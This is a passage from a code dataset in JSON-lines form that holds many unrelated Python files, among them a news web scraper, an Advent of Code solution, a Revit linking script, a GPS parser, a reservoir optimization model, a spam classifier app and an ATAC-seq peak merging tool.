\"http://finance.sina.com.cn/stock/\",\n # \"access_history\" : {},\n # \"scraping_rule\" : [\n # {\n # \"field_name\" : \"title\",\n # \"tag\" : \"h1\",\n # \"property\" : \"id\",\n # \"filter\" : \"artibodyTitle\"\n # },\n # {\n # \"field_name\" : \"article_body\",\n # \"tag\" : \"div\",\n # \"property\" : \"id\",\n # \"filter\" : \"articleContent\"\n # },\n # {\n # \"field_name\" : \"article_datetime\",\n # \"tag\" : \"span\",\n # \"property\" : \"class\",\n # \"filter\" : \"time-source\"\n # },\n # {\n # \"field_name\" : \"article_editor\",\n # \"tag\" : \"p\",\n # \"property\" : \"class\",\n # \"filter\" : \"article-editor\"\n # },\n # {\n # \"field_name\" : \"article_summary\",\n # \"tag\" : \"\",\n # \"property\" : \"\",\n # \"filter\" : \"\"\n # }\n # ],\n # \"active\" : true\n # }\n\n _start = datetime.now()\n lst_target = UTIL_DB.find(COL_ROUTINE_URL_LIST, {'active': True})\n _duration = datetime.now() - _start\n UTIL_LOG.operation_log('%s - 获得%s待扫描目标地址,本次操作耗时%s。' % (datetime.now(),\n lst_target.count(),\n _duration), True)\n\n return lst_target\n\n def update_routine_history(self, url, doc):\n \"\"\" Update the routine history.\n\n keyword arguments:\n url: the url which scraped, used to find the match from target url list.\n doc: the document of target list which added the right history list item.\n \"\"\"\n UTIL_DB.update(COL_ROUTINE_URL_LIST, {'url': url}, doc)\n\n # Scraping rule operations\n def set_scraping_rule(self, routine_url):\n \"\"\"\n Set and initialize the ScrapingRule instance\n :param routine_url:\n :return:\n \"\"\"\n self._scraping_rule = ScrapingRule(routine_url)\n\n def get_scraping_rule(self):\n \"\"\"\n Get the ScrapingRule instance\n :return:\n \"\"\"\n return self._scraping_rule\n\n # Page manipulate operations\n def parse_urls_in_page_content(self, bs_obj: BeautifulSoup, apply_blacklist_check=True):\n \"\"\"\n 获取所传入url地址页面中所有url链接并保存进数据库待抓取地址列表\n :param bs_obj: BeautifulSoup object,页面内容\n :param apply_blacklist_check: 是否应用黑名单检查,如果应用黑名单检查,被匹配的url不会被记录。\n :return:\n \"\"\"\n lst_urls = bs_obj.find_all('a', {'target': '_blank', 'href': re.compile('shtml')})\n\n for url_tag in lst_urls:\n if apply_blacklist_check and self.exits_in_url_blacklist(url_tag['href']):\n # Remove from the target url list if found in blacklist\n UTIL_LOG.operation_log('%s hit in the blacklist check, no save.' % url_tag['href'], debug_only=True)\n lst_urls.remove(url_tag)\n else:\n # Add to UrlAccessHistory collection if check not visited\n history = UrlAccessHistory(url_tag['href'])\n if not history.has_visited():\n history.save()\n else:\n lst_urls.remove(url_tag)\n\n return lst_urls\n\n def unvisited_urls(self):\n \"\"\"\n 从UrlAccessHistory表中返回所有还未访问过的url地址\n :return: list对象\n \"\"\"\n return UTIL_DB.find(target_collection=COL_ACCESS_HISTORY, query_filter={'access_datetime': ''})\n\n def has_visited(self, url: str):\n \"\"\"\n Check if the specified URL has been visited before.\n :param url: \n :return: \n \"\"\"\n doc = UTIL_DB.find_one(COL_ACCESS_HISTORY, {'url': url})\n if doc is not None and len(doc) > 0:\n if doc['access_datetime'] != '':\n return True\n else:\n return False\n else:\n return False\n\n def parse_and_save_article_content(self, bs_obj: BeautifulSoup):\n \"\"\"\n 根据抓取规则抓取并保存文章内容\n :param bs_obj: 待抓取的BeautifulSoup对象\n :return:\n \"\"\"\n # TODO: Need to study how to generalize and make the reusable scraping rule model\n # scraping_rule = self.get_scraping_rule()\n\n return\n\n def fetch_url(self, url: str, force_visit=False, ignore_error=True, check_blacklist=True):\n \"\"\" \n Fetch web content from given url.\n :param url: string, the target url to fetch.\n :param force_visit: force visit even has visited before\n :param ignore_error: Ignore raised error\n :param check_blacklist: Check blacklist before access, bypass if exists in the blacklist.\n :return BeautifulSoup object\n \"\"\"\n\n if check_blacklist:\n if self.exits_in_url_blacklist(url):\n UTIL_LOG.operation_log('%s targeted by blacklist checking, access bypassed.' % url, debug_only=True)\n return\n\n if not force_visit and self.has_visited(url):\n # Url in the blacklist or has been visited before\n if not force_visit:\n UTIL_LOG.operation_log('%s targeted by visited checking, access bypassed.' % url, debug_only=True)\n return\n\n # 清洗url格式,用\\s匹配任意的空白符,包括空格,制表符(Tab),换行符,中文全角空格等后替换去除\n url = re.compile(r'\\s').sub('', url)\n\n res = requests.get(url)\n res.encoding = res.apparent_encoding\n UTIL_LOG.operation_log(log='%s, status code:%s' % (url, res.status_code), debug_only=True)\n\n try:\n res.raise_for_status()\n except Exception as e:\n # 发生错误,返回None\n UTIL_LOG.error_log(e, debug_only=True)\n if not ignore_error:\n raise e\n return None\n\n bs_obj = BeautifulSoup(res.text, 'lxml')\n return bs_obj\n\n def fetch_article_list(self, url):\n \"\"\" \n Fetch article list from given url.\n\n keyword arguments:\n url: string, the url to fetch the article list\n \"\"\"\n\n _starttime = datetime.now()\n bs_obj = self.fetch_url(url)\n\n lst_articles = bs_obj.find_all('a', {'target': '_blank', 'href': re.compile('shtml')})\n for i in lst_articles:\n gap = i['href'].rfind('.shtml') - i['href'].rfind('/') - 1\n if gap < 12 or i.string is None:\n lst_articles.remove(i)\n\n _executeduration = datetime.now() - _starttime\n\n UTIL_LOG.operation_log(\n \"%s - 从%s获得%s待处理文章项目,本次操作耗时%s\" % (datetime.now(), url, len(lst_articles), _executeduration))\n\n return lst_articles\n\n def parse_all_url_from_page(self, url):\n \"\"\"\n 从所给的页面中抓取所有超链接\n 缺省规则:target=blank,以shtml结尾\n 返回:获取到的url列表\n \"\"\"\n _start = datetime.now()\n bs_obj = self.fetch_url(url)\n lst_urls = bs_obj.find_all('a', {'target': '_blank', 'href': re.compile('shtml')})\n UTIL_LOG.operation_log('在%s找到%s个超链接。本次操作时间%s' % (url,\n lst_urls.count(),\n datetime.now() - _start))\n return lst_urls\n\n def parse_content_from_bsobj(self, bs_obj, target, parse_filter):\n \"\"\" Parse content from inputted BeautifulSoup object\n\n keyword arguments:\n bs_obj: the BeautifulSoup object to manipulate\n target: the html tag which are looking for\n parse_filter: the rules to match the specific tag\n \"\"\"\n result = bs_obj.find(target, parse_filter)\n if result is not None:\n return result.get_text()\n else:\n return ''\n","sub_path":"CME/Utilities/utilScraping.py","file_name":"utilScraping.py","file_ext":"py","file_size_in_byte":11094,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"173711892","text":"import pickle\nfrom math import ceil\nimport os.path\n\n\ndef file_exist():\n if os.path.exists(\"test.txt\"):\n b = open_file()\n print(b)\n return\n else:\n a = []\n with open(\"test.txt\", 'wb') as f:\n pickle.dump(a, f)\n return\n\n\n\ndef open_file():\n with open(\"test.txt\", \"rb\") as f:\n b = pickle.load(f)\n return b\n\ndef write_file(liste):\n with open(\"test.txt\", 'wb') as f:\n pickle.dump(liste, f)\n\ndef create_user(name):\n a = open_file()\n for i in a:\n if i[1] == name:\n return\n a.append(['Unknow', name, 0,0,0])\n write_file(a)\n\ndef add_canette(name):\n a = open_file()\n for i in a:\n if i[1] == name:\n i[2] += 1\n write_file(a)\n return i[2]\n return 0\n\ndef add_gateau(name):\n a = open_file()\n for i in a:\n if i[1] == name:\n i[3] += 1\n write_file(a)\n return i[3]\n return 0\n\ndef rm_canette(name):\n a = open_file()\n for i in a:\n if i[1] == name:\n i[2] -= 1\n write_file(a)\n return i[2]\n return 0\n\ndef rm_gateau(name):\n a = open_file()\n for i in a:\n if i[1] == name:\n i[3] -= 1\n write_file(a)\n return i[3]\n return 0\n\ndef add_autre(name,value):\n a = open_file()\n for i in a:\n if i[1] == name:\n i[4] += value\n write_file(a)\n return i[4]\n return 0\ndef rm_autre(name,value):\n a = open_file()\n for i in a:\n if i[1] == name:\n i[4] -= value\n write_file(a)\n return i[2]\n return 0\n\ndef see_ardoise(name):\n a = open_file() \n for i in a:\n if i[1] == name:\n can = (ceil(100*(i[2]*0.6)))/100\n gat = (ceil(100*(i[3]*0.8)))/100\n aut = (ceil(100*(i[4])))/100\n tot = (ceil((can + gat + aut)*100))/100\n return (\"Tu dois \" + str(tot) + \"$\")\n\ndef wipe(name):\n a = open_file()\n for i in a:\n if i[1] == name:\n i[2] = 0\n i[3] = 0\n i[4] = 0\n write_file(a)\n\n\n\n","sub_path":"telecyc.py","file_name":"telecyc.py","file_ext":"py","file_size_in_byte":2142,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"608643656","text":"x,l=map(int,input().split())\nc=0\nfor i in range(x,l+1):\n if(i>1):\n for v in range(2,i):\n if(i%v==0):\n break\n else:\n c+=1\nprint(c) \n\n","sub_path":"player9.py","file_name":"player9.py","file_ext":"py","file_size_in_byte":202,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"602750535","text":"\r\n\r\nimport os\r\nimport pandas as pd\r\nimport matplotlib.pyplot as plt\r\n\r\nos.chdir('C:\\PANDAS\\practicaltimeseries\\data')\r\nos.getcwd()\r\n\r\nsp500_df = pd.read_csv('GSPC.csv')\r\n\r\n# Change the row indices of the dataframe using the Date column\r\nsp500_df.index = sp500_df['Date']\r\n\r\nprint(sp500_df.head(10))\r\n\r\n\r\nos.chdir('C:\\PANDAS2019\\plots_out')\r\nplt.figure(figsize=(5.5, 5.5))\r\nsp500_df['Close'].plot(color='b')\r\nplt.title('S&P 500 between 2001 - 2018')\r\nplt.xlabel('Time')\r\nplt.ylabel('Closing Value')\r\nplt.savefig('sp500_20190918.png', format='png', dpi=300)\r\n","sub_path":"stock_data_read_and_plot_out.py","file_name":"stock_data_read_and_plot_out.py","file_ext":"py","file_size_in_byte":557,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"252824584","text":"# Location variables\r\ndataDir = \"location/of/feedback/directory/\" # Where feedback information will be stored\r\n\r\n# Processing variables\r\ncontinueFromLast = False # Whether or not to continue from the last-found population\r\nfeedbackInterval = 1 # Every so many generations, save feedback information\r\nmaxGenerations = 10 # Maximum number of generations. 'None' will run indefinately.\r\n\r\n# Mutatable variables\r\nmutationRate = 0.1 # Larger than 1. How often a DNA mutation occurs per offspring.\r\ncrossoverRate = 0.9 # Larger than 1. How often crossover occurs between parental DNA.\r\ntournamentSize = 5 # How large of a tournament occurs to find best-fitness mate.\r\n\r\n# Semi-static variables\r\npopulationSize = 30 # Number of individuals in a population.\r\ncodonRange = 1000 # How many different numbers are available per codon in DNA.\r\nnumberHiddenNeurons = 10 # How many neurons there are in the first neural layer per neural network.\r\nnumberGames = 30 # How many games of prisoner's dilemma are played per match.\r\n\r\n# Graph variables\r\nnumberChunks = 50 # How many averages are calculated per variable\r\n","sub_path":"settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":1188,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"301492982","text":"import os\nimport re\n\nimport numpy as np\n\nfrom config import DATA_DIR\n\ndef _parse_claim(input_line):\n\t\"\"\"\n\tParses a claim of the format \"#1305 @ 400,523: 25x10\" and returns\n\tthe claim details as a dict with ['id', 'x', 'y', 'w', 'h'] as the\n\tkeys.\n\n\tInputs -\n\t\tinput_line - a claim of format \"#id @ x,y: wxh\"\n\n\tReturns -\n\t\tclaim_details - a dict with ['id', 'x', 'y', 'w', 'h'] as the\n\t\t\tkeys, and their respective values.\n\t\"\"\"\n\tclaim_keys = ['id', 'x', 'y', 'w', 'h']\n\tclaim_details = re.compile(r'[#@,:x]+').split(input_line)\n\tclaim_details.remove('')\n\tclaim_details = [int(detail.strip()) for detail in claim_details]\n\tclaim_dict = dict([(claim_keys[ix], claim_details[ix])\n\t\t\t\t\t\tfor ix, _ in enumerate(claim_details)])\n\treturn claim_dict\n\ndef _get_input_list(input_file_name):\n\tinput_data_file = os.path.join(DATA_DIR, input_file_name)\n\twith open(input_data_file, 'r') as fp:\n\t\tinput_data = [_parse_claim(line.strip()) for line in fp]\n\treturn input_data\n\ndef _get_fabric_with_claims(claims):\n\t\"\"\"\n\tGets the claims, iterates over them, and mark the fabric with the\n\tpossible overlaps. Any overlap is marked with a -1.\n\n\tInputs -\n\t\tclaims - a list of dicts, each dict representing a claim. Same\n\t\t\tdict as returned by _parse_claim().\n\n\tReturns -\n\t\tfabric - an np.array with claim_id in each square inch and\n\t\t\t-1 in overlapping areas.\n\t\"\"\"\n\tfabric = np.zeros((1000, 1000))\n\tfor claim in claims:\n\t\tx, y, w, h = claim['x'], claim['y'], claim['w'], claim['h']\n\t\tpatch = fabric[x: x + w, y: y + h]\n\t\tpatch[patch != 0] = -1\n\t\tpatch[patch == 0] = claim['id']\n\treturn fabric\n\ndef one():\n\tclaims = _get_input_list('day_three.txt')\n\tfabric = _get_fabric_with_claims(claims)\n\treturn (fabric == -1).sum()\n\ndef two():\n\tclaims = _get_input_list('day_three.txt')\n\tfabric = _get_fabric_with_claims(claims)\n\tfor claim in claims:\n\t\tx, y, w, h = claim['x'], claim['y'], claim['w'], claim['h']\n\t\tpatch = fabric[x: x + w, y: y + h]\n\t\toverlapping_square_inches = (patch == -1).sum()\n\t\tif not overlapping_square_inches:\n\t\t\treturn claim['id']\n","sub_path":"day_three.py","file_name":"day_three.py","file_ext":"py","file_size_in_byte":2021,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"338973495","text":"\"\"\"Example of using 'ping' command, device & connection integration\nwhen given a device object\"\"\"\n\nfrom ats.topology import loader\nfrom ats import topology\n\ntestbed = topology.loader.load('''\ndevices:\n vm424583:\n os: 'linux'\n tacacs:\n username: mshumakov\n passwords:\n linux: mykola00\n connections:\n linux:\n protocol: ssh\n ip: 192.168.242.44\n type: 'linux'\n ''')\n\ndevice = testbed.devices['vm424583']\ntest_ip = '108.177.119.103'\n\n# users should be able to directly interface with it, eg:\n# connect to it\ndevice.connect()\n\n# send commands\noutput = device.execute('hostname')\ndevice.ping(test_ip)\n\nassert output in testbed\n\n# disconnect from device\ndevice.disconnect()\n","sub_path":"case_8/topology_ping.py","file_name":"topology_ping.py","file_ext":"py","file_size_in_byte":764,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"277609963","text":"\n# part of the code originally created by Nicklas Østertgaard nvo@bimshark.com / nvo@shl.fk and/or Augusto Goncalves (AEC Devblog)\n# Workset management, loop, pin and site location settings by Jonathan ATGER (jonathan.atger@yahoo.fr)\n\nimport clr\n\n# Import ToDSType(bool) extension method\nclr.AddReference(\"RevitNodes\")\nimport Revit\nclr.ImportExtensions(Revit.Elements)\n\n# Import DocumentManager and TransactionManager\nclr.AddReference(\"RevitServices\")\nimport RevitServices\nfrom RevitServices.Persistence import DocumentManager\nfrom RevitServices.Transactions import TransactionManager\nfrom System.Collections.Generic import *\n\n# Import RevitAPI\nclr.AddReference(\"RevitAPI\")\nimport Autodesk\nfrom Autodesk.Revit.DB import *\n\nimport sys\npyt_path = r'C:\\Program Files (x86)\\IronPython 2.7\\Lib'\nsys.path.append(pyt_path)\nimport System\n\ndoc = DocumentManager.Instance.CurrentDBDocument\n\n# Start Transaction\nTransactionManager.Instance.EnsureInTransaction(doc)\n\nif isinstance(IN[0], list) : in_links = IN[0] \nelse : in_links = [IN[0]]\n\nif isinstance(IN[1], list) : in_ws = IN[1] \nelse : in_ws = [IN[1]]\n\n# number of elements\ntry : numlinks = len(in_links)\nexcept : OUT = 'append link'\n\t\ntry : numworksets = len(in_ws)\nexcept : numworksets = 0\n\n#check list lengths\nif numlinks == numworksets : listlength = True\nelse : listlength = False\n\ndef linkmodel (fpath, options, doc, pin) :\n\t# Create the Revit Link Type\n\tmp = ModelPathUtils.ConvertUserVisiblePathToModelPath(fpath)\n\tlnkOp = RevitLinkOptions(options)\n\tloadedLnkType = RevitLinkType.Create(doc, mp, lnkOp)\n\t\n\t# Create the Revit Link Instance \n\tlnkInstance = RevitLinkInstance.Create(doc, loadedLnkType.ElementId, ImportPlacement.Shared)\n\t\n\t#Pin link\n\tlnkInstance.Pinned = pin\n\treturn lnkInstance\n\ntry:\n\t# Number of worksets input and filepaths input are different\n\tif IN[1] and listlength == False :\n\t\tOUT = \"The number of worksets doesn't match the number of links\"\n\t\t\n\t\t\n\t# Multiple Worksets input\n\telif IN[1] and listlength == True :\n\t\n\t\t#Get WorksetTable and current workset\n\t\twstable = doc.GetWorksetTable()\n\t\tactivewsid = wstable.GetActiveWorksetId()\n\t\t\n\t\t#Create list for output\n\t\tlinks = []\n\t\t\n\t\tfor fpath, ws in zip(in_links, in_ws) :\n\t\t\n\t\t\t# Get WorksetId\n\t\t\twssimpleid = ws.Id\n\t\t\twsid = WorksetId(wssimpleid)\n\t\t\t\t\n\t\t\t# Set the workset\n\t\t\tWorksetTable.SetActiveWorksetId(wstable, wsid)\n\t\t\t\n\t\t\t# Create the Revit Link Type and Link Instance\n\t\t\ta = linkmodel(fpath,\"\", doc, IN[2])\n\t\t\t\n\t\t\t#add created link to output\n\t\t\tlinks.append(a)\n\t\t\t\t\t\t\t\n\t\t#reset current workset\t\n\t\tWorksetTable.SetActiveWorksetId(wstable, activewsid)\n\t\t\n\t\t#output\n\t\tOUT = links\t\n\n\t# No worksets input\n\telse :\n\t\tlinks = []\n\t\tfor fpath in in_links :\n\t\t\ta = linkmodel(fpath, \"\", doc, IN[2])\n\t\t\tlinks.append(a)\n\t\tOUT=links\n\t\nexcept:\n # if error accurs anywhere in the process catch it\n import traceback\n errorReport = traceback.format_exc()\n OUT = errorReport \n\n# End Transaction\nTransactionManager.Instance.TransactionTaskDone()\n\n","sub_path":"Python/LinkModel.SharedCoordinates.py","file_name":"LinkModel.SharedCoordinates.py","file_ext":"py","file_size_in_byte":2973,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"77511146","text":"\"\"\"Post urls\"\"\"\n\n# Django \nfrom django.urls import path\n\n# Views\nfrom posts import views \n\nurlpatterns = [\n path('', views.PostFeedView.as_view(), name='posts'),\n path('posts/new/', views.PostCreateView.as_view(), name='new_post'),\n path('posts/', views.PostDetailView.as_view(), name='detail_post'),\n]\n","sub_path":"posts/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":320,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"485599028","text":"import re\nimport json\n\n\"\"\"\nCode to parse the gps data returned by Fona module\n\n@author Pankaj Meghnai \n@date 30 July, 2021\n\"\"\"\n\nclass GPS_Parser:\n def __init__(self, string):\n regex_exp = r\"CGPSINFO:([\\d.]*)(?:,?)([NS]?)(?:,?)([\\d.]*),([EW]?),\\d*,[\\d.]*,([\\d.]*),([\\d.]*),(\\d*)\"\n\n matches = re.search(regex_exp, string)\n is_okay = re.search(r'\\b(OK)\\b', string)\n\n seperator = '.'\n\n if (is_okay == None):\n okay = False\n latitude = longitude = altitude = speed = course = None\n else:\n okay = True\n\n latitude = matches.group(1)\n latitude = latitude[:2]+seperator+latitude[2:4]+latitude[5:]\n if (matches.group(2) == 'S'):\n latitude = '-'+latitude\n\n longitude = matches.group(3)\n longitude = longitude[:3]+seperator+longitude[3:5]+longitude[6:]\n if (matches.group(4)=='W'):\n longitude = '-'+longitude\n\n altitude = matches.group(5)\n speed = matches.group(6)\n course = matches.group(7)\n\n self.okay = okay\n self.latitude = latitude\n self.longitude = longitude\n self.altitude = altitude\n self.speed = speed\n self.course = course\n\n def __str__(self):\n return ' '.join([\n str(self.okay),\n self.latitude,\n self.longitude,\n self.altitude,\n self.speed,\n self.course\n ])\n\n def toJSON(self):\n return json.dumps(self, default=lambda o: o.__dict__,\n sort_keys=True, indent=4)\n\n","sub_path":"Revision 2/GPS_Parser.py","file_name":"GPS_Parser.py","file_ext":"py","file_size_in_byte":1612,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"78222278","text":"import numpy as np \nimport matplotlib.pyplot as plt\nfrom cvxpy import *\nimport seaborn as sns\nsns.set_style('whitegrid')\n\n# multireservoir problem from Heidari et al. 1971\n# the beginning is all data setup\n\nT = 12\n\nX = Variable(T+1, 4)\nU = Variable(T, 4)\n\n# benefits matrix from paper\nB = np.array([[1.1,1.4,1.0,1.0,1.6],\n [1.0,1.1,1.0,1.2,1.7],\n [1.0,1.0,1.2,1.8,1.8],\n [1.2,1.0,1.8,2.5,1.9],\n [1.8,1.2,2.5,2.2,2.0],\n [2.5,1.8,2.2,2.0,2.0],\n [2.2,2.5,2.0,1.8,2.0],\n [2.0,2.2,1.8,2.2,1.9],\n [1.8,2.0,2.2,1.8,1.8],\n [2.2,1.8,1.8,1.4,1.7],\n [1.8,2.2,1.4,1.1,1.6],\n [1.4,1.8,1.1,1.0,1.5]])\n\n# reservoir connectivity matrix\nM = np.array([[-1,0,0,0],\n [0,-1,0,0],\n [0,1,-1,0],\n [1,0,1,-1]])\n\n# inflows (constant)\ny = np.zeros((T,4))\ny[:,0] = 2\ny[:,1] = 3\n\n# storage upper bound\nXUB = 10*np.ones((T+1,4))\nXUB[:,3] = 15\nUUB = 4*np.ones((T,4))\nUUB[:,0] = 3\nUUB[:,3] = 7\n\n# objective function (hydropower plus ag benefit)\nobj = Maximize(B[:,0].T*U[:,0] + B[:,1].T*U[:,1] \n + B[:,2].T*U[:,2] + B[:,3].T*U[:,3] + B[:,4].T * U[:,3])\n\n# mass balance constraint in matrix form\nc_mass_balance = [X[1:,:] == X[:-1,:] + y + U*M.T]\nc_nonneg = [U >= 0, X >= 0] # release lower/upper bounds\nc_ub = [X <= XUB, U <= UUB]\nc_init_final = [X[0,:] == 5, X[T,:] >= np.array([[5,5,5,7]])]\nconstraints = c_mass_balance + c_nonneg + c_ub + c_init_final\n\nprob = Problem(obj, constraints)\nprob.solve()\n\nprint('Status: %s' % prob.status)\nprint('Obj Fun: %f' % obj.value)\n\nfor i in range(4):\n plt.subplot(2,2,i+1)\n plt.plot(X[:,i].value)\n plt.ylim([0,10])\n plt.title('Reservoir %d' % (i+1))\n\nplt.show()\n","sub_path":"L13-multireservoir-heidari.py","file_name":"L13-multireservoir-heidari.py","file_ext":"py","file_size_in_byte":1742,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"387404528","text":"import streamlit as st\r\nimport pickle\r\nimport nltk\r\nnltk.data.path.append('./nltk_data/')\r\nimport string\r\nfrom nltk.corpus import stopwords\r\n\r\nfrom nltk.stem import WordNetLemmatizer\r\nimport re\r\n\r\nlemmatizing=WordNetLemmatizer()\r\ndef transform_text(text):\r\n text = text.lower()\r\n text=re.sub('[^a-zA-Z]',' ',text)\r\n text = nltk.word_tokenize(text)\r\n y = []\r\n text=[lemmatizing.lemmatize(word) for word in text if not word in set(stopwords.words('english'))]\r\n text=' '.join(text)\r\n y.append(text)\r\n y=' '.join(y)\r\n return y\r\n\r\nbow = pickle.load(open('vectorizer.pkl','rb'))\r\nmodel = pickle.load(open('model.pkl','rb'))\r\nst.title(\"Sukku Email/SMS Spam Classifier\")\r\n\r\ninput_sms = st.text_area(\"Enter the message to check with 98% accuracy\")\r\n\r\nif st.button('Predict'):\r\n\r\n # 1. preprocess\r\n transformed_sms = transform_text(input_sms)\r\n # 2. vectorize\r\n vector_input = bow.transform([transformed_sms])\r\n # 3. predict\r\n result = model.predict(vector_input)[0]\r\n # 4. Display\r\n if result == 1:\r\n st.header(\"Spam\")\r\n else:\r\n st.header(\"Not Spam\")","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1110,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"469036618","text":"import sys\n\nresources = []\n\n\ndef error(msg, code):\n sys.stderr.write(msg + '\\n')\n if code == 64:\n sys.stderr.write('\\nUse \"python mcbuild.py -h\" to see the syntax\\n')\n for res in resources:\n res.__exit__()\n exit(code)\n\n\ndef parse_args():\n args = []\n opts = []\n\n for arg in sys.argv[1:]:\n if arg[0] == '-':\n if arg[1] == '-':\n opts.append(arg[2:])\n else:\n for c in arg[1:]:\n opts.append(c)\n else:\n args.append(arg)\n\n return args, opts\n\n\ndef deflate(line):\n parts = line.split('\"')\n return '\"'.join(map(lambda i, val: ''.join(val if i % 2 else ['' if c.isspace() else c for c in val]), range(len(parts)), parts))\n\n\ndef escape(text):\n s = ''\n for c in text:\n if c in ('\\\\', '\"'):\n s += '\\\\'\n s += c\n return s\n","sub_path":"util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":880,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"20960020","text":"from DLinkedList import DList\nfrom dynamicArray import DynamicArray\n\n\ndef radix_sort_int(sort_list, max):\n arr = DynamicArray(10)\n for i in range(len(arr.array)):\n arr.array[i] = DList()\n digit = 1\n while digit <= max:\n print(\"================= Ordering by \" + str(digit) + \"'s ======================\")\n for j in sort_list:\n arr.array[(j // digit) % 10].Append(x=j)\n i = 0\n for k in arr.array:\n start = k.head\n if start is not None:\n while not k.IsEmpty():\n print(start.data)\n temp = start.next\n sort_list[i] = k.Remove(start.data)\n start = temp\n i += 1\n digit *= 10\n return sort_list\n\n\ndef radix_sort_string(a, max):\n arr = DynamicArray(37)\n for i in range(len(arr.array)):\n arr.array[i] = DList()\n\n for i in range(max):\n print(\"================= Ordering by \" + str(i+1) + \"place ======================\")\n for item in a:\n if len(item) > (max - (max - i)):\n # print(item[i], end=\"\")\n arr.array[ord(item[max-(max-len(item))-(i+1)].lower())-96].Append(x=item)\n else:\n # print(\"-\", end=\"\")\n arr.array[0].Append(x=item)\n h = 0\n for k in arr.array:\n start = k.head\n if start is not None:\n while not k.IsEmpty():\n print(start.data)\n temp = start.next\n a[h] = k.Remove(start.data)\n start = temp\n h += 1\n return a\n","sub_path":"Lab 2/RadixSort.py","file_name":"RadixSort.py","file_ext":"py","file_size_in_byte":1668,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"547965413","text":"#!/usr/bin/env python3\n# -*- encoding: utf-8 -*-\n'''\n***********************************************************\n* Author : Zhou Wei *\n* Date : 2020/09/08 11:04:28 *\n* E-mail : welljoea@gmail.com *\n* Version : -- *\n* You are using the program scripted by Zhou Wei. *\n* If you find some bugs, please *\n* Please let me know and acknowledge in your publication. *\n* Thank you! *\n* Best wishes! *\n***********************************************************\n'''\nimport pybedtools as bt\nimport pandas as pd\nimport numpy as np\nimport re\nimport os\nimport sys\n'''\npd.set_option('display.max_rows', 100000)\npd.set_option('display.max_columns', 100000)\npd.set_option('display.width', 100000)\n'''\n\nclass MergePeaks():\n def __init__(self, arg, log, *array, **dicts):\n self.arg = arg\n self.log = log\n self.array = array\n self.dicts = dicts\n self.head_n = ['chr', 'start', 'end', 'name', 'score', 'strand', 'signalValue', 'pvalue', 'qvalue', 'peak']\n self.merg_n = ['chr', 'start', 'end', 'starts', 'ends', 'name', 'score', 'strand', 'signalValue', 'pvalue', 'qvalue', 'peak', 'sample']\n self.bedfiles = [i.strip() for i in re.split( '[,;@]', self.arg.bedfiles )]\n if self.arg.IDs == 'infer':\n self.IDs = [ '_'.join( os.path.basename(i).split('_')[:-1] ) for i in self.bedfiles ]\n else:\n self.IDs = [i.strip() for i in re.split( '[,;@]', self.arg.IDs )]\n if len(self.IDs) != len(self.bedfiles):\n self.log.CW(\"the bedfile length is not equal with the IDs's.\")\n sys.exit(0)\n\n def BTmerge(self, peaktype='narrow'):\n Beddf = []\n for i in range(len(self.bedfiles)):\n k = pd.read_csv(self.bedfiles[i], sep='\\t',header=None)\n k.insert(10, 10, self.IDs[i] )\n Beddf.append(k)\n Beddf = bt.BedTool.from_dataframe( pd.concat(Beddf, axis=0) )\n #Bedsort = bt.BedTool(self.bedfiles[0])\n #Bedsort = Bedsort.cat(*self.bedfiles[1:], postmerge=False)\n Beddf = Beddf.sort()\\\n .merge( c=','.join([ str(i) for i in range(2,12)]),\n o=','.join(['collapse']*10))\\\n .to_dataframe(disable_auto_names=True, header=None,names=self.merg_n)\n Beddf.to_csv('%s/merge.peaks_bedtools.xls'%(self.arg.outdir), sep='\\t', header=True,index=False)\n return Beddf\n\n def Peakpivot(self):\n pass\n\n\nclass Pipeline():\n 'The pipeline used for machine learning models'\n def __init__(self, arg, log, *array, **dicts):\n self.arg = arg\n self.log = log\n self.array = array\n self.dicts = dicts\n\n def Pipe(self):\n\n if self.arg.commands in ['mergepeak', 'Auto']:\n MergePeaks(self.arg, self.log).BTmerge()\n\nimport argparse\ndef Args():\n parser = argparse.ArgumentParser(\n formatter_class=argparse.RawDescriptionHelpFormatter,\n prefix_chars='-+',\n conflict_handler='resolve',\n description=\"\",\n epilog=\"\")\n\n parser.add_argument('-V','--version',action ='version',\n version='ATACtools version 0.1')\n\n subparsers = parser.add_subparsers(dest=\"commands\",\n help='models help.')\n P_Common = subparsers.add_parser('Common',conflict_handler='resolve', #add_help=False,\n formatter_class=argparse.ArgumentDefaultsHelpFormatter,\n help='The common parameters used for other models.')\n P_Common.add_argument(\"-i\", \"--input\",type=str,\n help='''the input file. You can use comma, semicolon or at to split multiple files''')\n P_Common.add_argument(\"-o\", \"--outdir\",type=str,default=os.getcwd(),\n help=\"output file dir, default=current dir.\")\n P_Common.add_argument(\"-p\", \"--prefix\",type=str,default='',\n help=\"output file header, default=None.\")\n\n P_mgpeak = subparsers.add_parser('mergepeak', conflict_handler='resolve', add_help=False)\n P_mgpeak.add_argument(\"-B\", \"--bedfiles\", type=str,\n help=\"Input bed files. You can use comma, semicolon or at to split multiple files\")\n P_mgpeak.add_argument(\"-I\", 